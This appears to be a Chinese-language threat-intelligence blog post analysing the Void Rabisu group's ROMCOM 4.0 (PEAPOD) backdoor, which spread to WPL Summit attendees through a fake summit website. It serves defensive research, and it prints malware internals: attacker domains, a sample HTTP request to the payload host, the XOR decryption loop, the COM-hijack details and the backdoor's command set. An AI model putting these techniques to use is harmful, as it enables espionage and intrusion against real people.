APT & 針對式目標攻擊
Void Rabisu 駭客集團使用全新精簡版 ROMCOM 變種瞄準女性政治領導人
時間過了將近一年,Void Rabisu 駭客集團從原本的投機式勒索病毒攻擊轉而聚焦網路間諜行動,並持續發展他們的主要惡意程式:ROMCOM 後門程式。
Void Rabisu 是一套駭客入侵工具,曾被用於以獲利為主的勒索病毒攻擊,以及瞄準烏克蘭和烏克蘭盟友的針對性攻擊。包括烏克蘭政府與軍方、烏克蘭能源與自來水公共事業、歐盟政治人物、某些歐盟國家政府發言人,以及一些安全研討會的與會者,都是駭客攻擊的目標。Void Rabisu 在 2023 年 6 月底至 8 月初期間所發動的攻擊瞄準了歐盟致力性別平等計畫的軍方與政治領導人。在 Void Rabisu 所使用的工具當中較值得注意的是 ROMCOM 後門程式,而且似乎是他們的專屬工具。隨著時間流逝,ROMCOM 後門程式已歷經多次改版,比方說加入了更有效的躲避偵測技巧。
Void Rabisu 集團同時運用了一般網路犯罪集團以及國家級網路間諜駭客的攻擊手法、技巧與程序 (TTP),而且是兩種手法兼具最典型的代表。例如,Void Rabisu 與其他網路犯罪集團一樣會從第三方服務供應商購買憑證來簽署其惡意程式。同時,還會在 Google 和 Bing 上刊登惡意廣告來,將搜尋引擎流量引導至誘騙網站,這些網站上提供了許多系統管理員常用軟體的惡意版本。
而當 Void Rabisu 在攻擊政府機關或軍事單位時,他們就會搖身一變,成為進階持續性滲透攻擊 (APT) 集團。2023 年 6 月,Void Rabisu 將 CVE-2023-36884 漏洞 (在當時還是個零時差漏洞) 應用於多起攻擊行動,並利用烏克蘭世界大會 (Ukrainian World Congress) 與 2023 年 7 月的北約 (NATO) 高峰會為誘餌。烏克蘭境內戰爭所引發的特殊地緣政治情勢,也使得某些原本以賺錢為導向的駭客集團 (包括 Void Rabisu 在內) 開始轉而從事間諜行動。
根據 Microsoft 指出,Void Rabisu 使用了一個 CVE-2023-36884 相關的零時差漏洞在 2023 年 6 月底發動了一波針對政府機關的攻擊。趨勢科技的監測資料進一步證實,這波攻擊行動瞄準了歐洲的軍方、政府人員以及政治人物。
Void Rabisu 在這段期間所散播的惡意程式有別於我們在先前一篇部落格當中分析的 ROMCOM 後門程式,但兩者卻有著明顯的相似之處,顯示駭客正積極地發展 ROMCOM 後門程式。
此惡意程式的下一個新版本在 2023 年 8 月初現身,大約在 2023 年 8 月 8 日左右,Void Rabisu 架設了一個假冒「女性政治領導人高峰會」(Women Political Leaders [WPL] Summit) 官方網站的惡意網站,該會已於 2023 年 6 月 7 日至 8 日在布魯塞爾 (Brussels) 舉行。該網站最終散播的惡意程式是一個新版的 ROMCOM 後門程式,我們將它命名為「ROMCOM 4.0」(網路上亦稱為 PEAPOD)。
這場 WPL Summit 的與會者來自世界各地,其宗旨是要改善政治圈的性別平等。2023 年布魯塞爾高峰會的議題包括:和平與安全、戰爭與迫害、假訊息、烏克蘭戰爭、女性在政治中的角色,以及性別平等。由於許多當今及未來的政治領導人都參加了這場會議,因此成了間諜活動鎖定的目標,同時也成為駭客入侵政治組織的一項途徑。所以毫不意外地,Void Rabisu 對 WPL Summit 2023 的與會者發動了一波攻擊。趨勢科技的監測資料提供了紮實的證據顯示,這項行動鎖定的目標就是在歐盟政治圈內致力推動性別平等的人士。
在一些最新的攻擊行動中,Void Rabisu 已開始使用先前從未報導過的新技巧。ROMCOM 的幕後操縱 (C&C) 伺服器會強制使用 TLS 連線來讓 ROMCOM 的基礎架構更不容易被資安防護自動偵測。根據我們的觀察,Void Rabisu 在 2023 年 5 月的一起 ROMCOM 攻擊行動中使用了這項技巧,該起行動會散播一個惡意版本的 PaperCut 軟體,其 C&C 伺服器會忽略未使用 TLS 連線的請求。
本文大致介紹了 Void Rabisu 以及它在最近 WPL Summit 攻擊行動中的活動。下一節,我們將先說明一下 Void Rabisu 如何攻擊 WPL Summit 的與會者。
冒牌的 WPL Summit 2023 網頁
2023 年 8 月 8 日,Void Rabisu 駭客集團架設了一個網站:wplsummit[.]com 來誘騙原本要造訪 wplsummit.org (正牌網址) 的訪客。冒牌網站 (參見圖 1) 的樣子看起來就跟正牌網站一模一樣。
正牌網站上的「Videos & photos」(影片與照片) 連結會將訪客帶到一個 Google Drive 資料夾,裡面有該活動的一些照片,但冒牌的 wplsummit[.]com 網站則會將訪客帶到一個 OneDrive 資料夾,裡面含有兩個壓縮檔以及一個名為 Unpublished Pictures 1-20230802T122531-002-sfx.exe 的執行檔。後者顯然是一個惡意程式,我們在下一節對其二進位檔案有詳盡的分析。
惡意程式分析
從 OneDrive 資料夾下載的執行檔是由一個名為 Elbor LLC 的公司使用合法的憑證所簽署 (該公司之前也簽署過不少惡意檔案)。該檔案執行時,會偽裝成一個自我解壓縮 (SFX) 檔案,並且在使用者按下「Extract」(擷取) 按鈕時從資源區段擷取出 56 張照片到某個資料夾:
擷取出的照片是駭客從 LinkedIn、X (原 Twitter)、Instagram 等各種社群媒體平台上的個人貼文蒐集而來。當受害者被這些照片引開注意力時,惡意程式就會在背後發送一個 HTTP GET 請求至 https://mctelemetryzone[.]com/favicon.ico。收到請求的伺服器會檢查這個 HTTP 請求中的 User-Agent 字串,如果是下列其中一種瀏覽器,就會下載一個 122 KB 的檔案:
「Mozilla/5.0 (Windows NT 10.0; Win64; x64; Xbox; Xbox One) AppleWebKit/537.36 (KHTML,如 Gecko) Chrome/114.0.0.0 Safari/537.36 Edge/44.18363.8131」
被下載的檔案是一個使用 XOR 方式加密的 PE 檔案:
被下載的檔案可使用以下程式碼來解密:
for (i=0; i<len; i++)
data[i] = data[i] ^ 0xf0 * i
解密後的檔案是一個 64 位元 DLL 函式庫,裡面提供了一個名為 CPLInit() 的函式。第一階段下載器接著將這個 DLL 載入到記憶體,然後呼叫前述函式。這裡要特別說明,這個 DLL 不會寫入磁碟當中,換句話說,這些下載、解密、執行的動作都是在記憶體內完成。
惡意程式設定
記憶體內執行的 DLL,其內部名稱為 trymenow.dll。它會對外連上 worldtimeapi.org 這個合法的線上服務來取得一個包含當下日期與時間的時間戳記 (採用 Unix Epoch 格式)。這個戳記後來會被當成某個演算法的種子,用於產生下次請求的網址路徑。
此路徑的正規表達式為 [12]/[0-9]{9},其中,斜線前面的部分代表下載器所請求的是哪個元件。斜線後面的部分可能是一個識別碼,因為在不同請求當中都有這個代碼。網址會先經過 Base64 格式編碼之後再傳送至 redditanalytics[.]
pm 來下載第三階段元件。以下是該請求的一個範例:
GET https://redditanalytics.pm/Mi8xMzI0NTY3ODk=
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 EdgiOS/114.1823.67 Mobile/15E148 Safari/605.1.15
Host: redditanalytics.pm
Connection: Keep-Alive
伺服器端在收到請求之後會對網址路徑進行解碼,如果一切正確,伺服器就會回覆另一個 XOR 加密的檔案,該檔案將被解密並儲存成 %PUBLIC%\AccountPictures\Defender\Security.dll,這是一個用來執行 COM 挾持技巧的 DLL 函式庫。此時,Void Rabisu 會挾持 CLSID {F5078F32-C551-11D3-89B9-0000F81FE221} 這個物件 (COM 挾持),它是 WordPad 應用程式使用的一個物件。
下個步驟又是對外連線到 worldtimeapi.org 來取得一個新的時間戳記,並從 redditanalytics[.]pm 下載另一個元件,這是用來與 C&C 伺服器 netstaticsinformation[.]com 通訊的元件。(這就是我們前一篇部落格談到的網路元件。)
在兩個惡意檔案都下載完成之後,就會啟動 WordPad 程式,並透過 COM 挾持技巧來執行第一個惡意檔案。
C&C 伺服器通訊
趨勢科技分析到的 PEAPOD 樣本會強迫 WinHTTP 函式使用 TLS 1.2 而非作業系統預設的版本。在之前使用 PaperCut 合法軟體為誘餌的攻擊中,C&C 伺服器會檢查用戶端的 HTTP 請求是否使用正確的 TLS 版本,如果版本不正確,就不會傳回惡意檔案。然而,此次針對 WPL Summit 2023 與會者的攻擊行動,用戶端在通訊時不管使用哪個版本的 TLS,其 C&C 伺服器都會回應。
惡意程式首先會使用 WinHttpSetOption() 函式來設定好旗標,以供後續使用。接著,它會建立一個 HTTP 連線階段,並將 User-Agent 字串設定為「Microsoft Edge 1.0」。不過,在發送至伺服器之前,它會將連線設定成使用 TLS 1.2。
我們檢查了一下在不同 Windows 版本上使用 SSL/TLS 旗標時會對應到哪個版本,下表是我們整理出來的資料:
| 作業系統 | WinHTTP 旗標 | 使用的 TLS 版本 |
|---|---|---|
| Windows 11 | WINHTTP_FLAG_SECURE_PROTOCOL_TLS1_2 | 1.2 |
| Windows 11 | (未設定 / 預設) | 1.3 |
| Windows 10 | WINHTTP_FLAG_SECURE_PROTOCOL_TLS1_2 | 1.2 |
| Windows 10 | (未設定 / 預設) | 1.2 |
| Windows 7 | WINHTTP_FLAG_SECURE_PROTOCOL_TLS1_2 | 發生錯誤 |
| Windows 7 | (未設定 / 預設) | 1 |
表 1:不同 Windows 版本的 SSL/TLS 旗標處理方式。
根據上表,我們認為 PEAPOD 應該不會感染使用 Windows 7 以及更早版本的作業系統。至於 Void Rabisu 為何要使用這個旗標,目前仍莫衷一是,但有可能是駭客想要在 C&C 伺服器端增加某種檢查來讓 C&C 指紋辨識更加困難。
在呼叫 WinHttpSendRequest() 來發送 POST 請求之前, 惡意程式還會再設定一些旗標來忽略所有的憑證錯誤。它會先發送一個空的請求,接著再發送一個含有某個指令的請求讓 C&C 伺服器知道受害者的資訊。
惡意程式如果無法透過 HTTPS 聯絡上 C&C 伺服器,就會試圖透過單純的 TCP (Transmission Control Protocol) 協定 (連接埠 442) 或 ICMP (Internet Control Message Protocol) 協定來通訊。
ROMCOM 3.0 與 PEAPOD 比較
感謝 Volexity 的研究人員將之前的 PEAPOD 樣本分享給我們,我們因此確認 Void Rabisu 似乎已經暫停使用 ROMCOM 3.0 並改用 PEAPOD,而且兩者之間似乎有一些架構上的差異。這些差異如下表所示:
| 功能 | ROMCOM 3.0 | PEAPOD |
|---|---|---|
| 惡意檔案植入器 | 修改安裝程式 (MSI 或 EXE) 來植入其他元件。 | EXE 檔案會下載經過 XOR 加密的 DLL 函式庫,DLL 再下載其他元件。 |
| 惡意程式核心模組 | 總共三個元件:COM 挾持 (載入器)、工作元件及網路元件。 | 目前觀察到三個元件:COM 挾持 (載入器)、工作元件 (儲存在 Windows 系統登錄中) 以及網路元件。大部分都是從記憶體中載入。 |
| 元件之間的 IPC 通訊 | 使用本機 socket。 | 使用具名管路 (named pipe)。 |
| 指令 | 工作元件可處理 42 個指令。 | 總共 10 個指令。其中 7 個由網路元件負責處理,其餘 3 個會轉給工作元件來處理。 |
表 2:ROMCOM 3.0 與 PEAPOD 的差異。
我們將 PEAPOD 所支援的指令整理在下表:
| 指令 | 說明 | 詳細資料 |
|---|---|---|
| 0 | 無動作 | 負責執行指令的函式會傳回零,惡意程式會等待下一個指令。 |
| 1 | 執行指令 | 執行某個指令並回傳輸出結果。 |
| 2 | 上傳檔案 | 上傳一個檔案到被感染的電腦。 |
| 3 | 下載檔案 | 從被感染的電腦下載一個檔案。 |
| 4 | 執行指令 | 執行一個指令。 |
| 5 | 更新後門程式檢查是否有新活動的間隔 (預設為 60 秒) | 新收到的間隔時間會經由具名管路傳給 security.dll,然後 security.dll 再寫入系統登錄中。 |
| 6 | 取得系統資訊 | 取得記憶體大小、處理器資訊、當地時間以及使用者名稱。 |
| 7 | 更新網路元件 | 新版網路元件的資料會寫到具名管路,然後再由載入器 (security.dll) 讀取並更新到 Windows 系統登錄。 |
| 8 | 解除安裝 PEAPOD | 系統登錄機碼會被清除,所有檔案也會被刪除。 |
| 9 | 取得服務名稱 | 回傳系統登錄中記載的服務名稱 (DisplayName)。 |
表 3:PEAPOD 支援的指令。
透過「表 3」上的指令,駭客就能讓感染 PEAPOD 的電腦下載另一個類似 ROMCOM 3.0 的工作元件,如此一來,受害的電腦就會如同感染 ROMCOM 3.0 一樣被駭客掌控。只不過,我們實驗室內的感染案例都沒有再下載其他額外的元件。
結論與展望
時間過了將近一年,Void Rabisu 駭客集團從原本的投機式勒索病毒攻擊轉而聚焦網路間諜行動,並持續發展他們的主要惡意程式:ROMCOM 後門程式。這個後門程式目前已經瘦身到只剩下核心元件,其他原件都是需要時才下載,這樣 Void Rabisu 就能針對不同目標下載不同的元件。從駭客的觀點,這樣的好處是可以減少曝光的元件,讓資安研究人員更難蒐集惡意程式樣本。
Void Rabisu 的某些攻擊是針對非常特定的政治人物、政府員工與軍方人員。這表示 Void Rabisu 已經開始轉進原本 APT 集團所掌握的地盤,APT 集團一般被認為是政府資助的國家級駭客。
儘管我們沒有證據顯示 Void Rabisu 有政府在背後資助,但他們有可能是因為當前烏克蘭境內戰爭所引發的特殊地緣政治局勢而被捲入間諜活動的網路地下犯罪集團之一。
Void Rabisu 在 2023 年當中至少攻擊了三個研討會的與會者:慕尼黑資安研討會 (Munich Security Conference)、數位大師 (Masters of Digital) 研討會,以及 WPL Summit。未來應該還會有其他研討會和特殊興趣團體也遭到 Void Rabisu 攻擊。我們將持續密切關注 Void Rabisu 的攻擊手法、技巧與程序 (TTP),一旦發現新的攻擊行動就會跟大家報告。
入侵指標 (IoC)
如需本文提到的入侵指標,請點選此連結。
在此特別感謝 Lord Remorin 的協助